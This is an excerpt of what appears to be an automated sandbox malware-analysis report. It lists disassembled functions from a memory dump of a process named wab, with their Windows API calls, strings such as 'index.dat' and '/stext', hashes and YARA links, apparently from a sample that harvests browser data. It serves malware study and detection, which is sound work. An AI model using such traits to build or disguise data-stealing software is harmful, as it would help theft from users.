                                                                                                                                                                                          • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                            • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00417627
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$File$PointerRead
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 839530781-0
                                                                                                                                                                                          • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                          • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                                                                                                          • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileFindFirst
                                                                                                                                                                                          • String ID: *.*$index.dat
                                                                                                                                                                                          • API String ID: 1974802433-2863569691
                                                                                                                                                                                          • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                          • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                                                                                                          • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004099F4 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@mallocmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3831604043-0
                                                                                                                                                                                          • Opcode ID: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                          • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a092ad8f2336585ed98353820426f0e3c8ffb733fb9aa85e0df6135544c2253
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A2
                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004175A8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLast$FilePointer
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1156039329-0
                                                                                                                                                                                          • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                          • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                                                                                                          • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                          • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1631957507-0
                                                                                                                                                                                          • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                          • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                                          • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                          • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1125800050-0
                                                                                                                                                                                          • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                          • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                          • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                          • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID: BINARY
                                                                                                                                                                                          • API String ID: 2221118986-907554435
                                                                                                                                                                                          • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                          • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                                                                                                                                            • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                            • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                            • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                            • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1161345128-0
                                                                                                                                                                                          • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                          • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                                                          • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                                                          • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                          • API String ID: 2081463915-3817206916
                                                                                                                                                                                          • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                          • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                                                                                                          • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                            • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                          • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 159017214-0
                                                                                                                                                                                          • Opcode ID: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                          • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce19115a923a15add3814b7342b05fb50f984b43095f56e0ebc72410723b566f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3150196962-0
                                                                                                                                                                                          • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                          • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                                                                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: malloc
                                                                                                                                                                                          • String ID: failed to allocate %u bytes of memory
                                                                                                                                                                                          • API String ID: 2803490479-1168259600
                                                                                                                                                                                          • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                          • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
                                                                                                                                                                                          • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e003a951d4b795c2795be91072552c134f268f2eb67798ac8aad6e8ea3cca53
                                                                                                                                                                                          • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B0B5 Relevance: 3.0, APIs: 2, Instructions: 7COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 613200358-0
                                                                                                                                                                                          • Opcode ID: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                                                                                                                          • Instruction ID: 93a37c1a4f050773dc1a5674df64ec50811fc8a39a1cc3e4a9db11821b00e242
                                                                                                                                                                                          • Opcode Fuzzy Hash: 10fc877065b6e48d7bdc99d18b4a7e13807bbdb0444c9cb367cecc131ffa056e
                                                                                                                                                                                          • Instruction Fuzzy Hash: A0B012310281004DEB057BA1B8061142302C64332E3B3413FE000500A3DE5D6034140F
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcmpmemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1065087418-0
                                                                                                                                                                                          • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                          • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                                                          • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406C5A Relevance: 2.7, APIs: 2, Instructions: 184COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406E09
                                                                                                                                                                                          • memcpy.MSVCRT ref: 00406E5A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpy$??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3700833809-0
                                                                                                                                                                                          • Opcode ID: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                          • Instruction ID: 3357a4f00022c45c5c3ded2ab4a10c96e173cb442a6a42c74f6c45d37007c03c
                                                                                                                                                                                          • Opcode Fuzzy Hash: fbf9b295b5a7520f84bfa942b8c4279f7b3464a00728e86ce032f040724bd2e9
                                                                                                                                                                                          • Instruction Fuzzy Hash: EE7117B1E00219EBCB04DFA9D8949EEB7B5FF08304F11802EF916A7281D7789951CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2221118986-0
                                                                                                                                                                                          • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                          • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                                                                                                                                                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.35581733355.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memcpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1297977491-0
                                                                                                                                                                                          • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
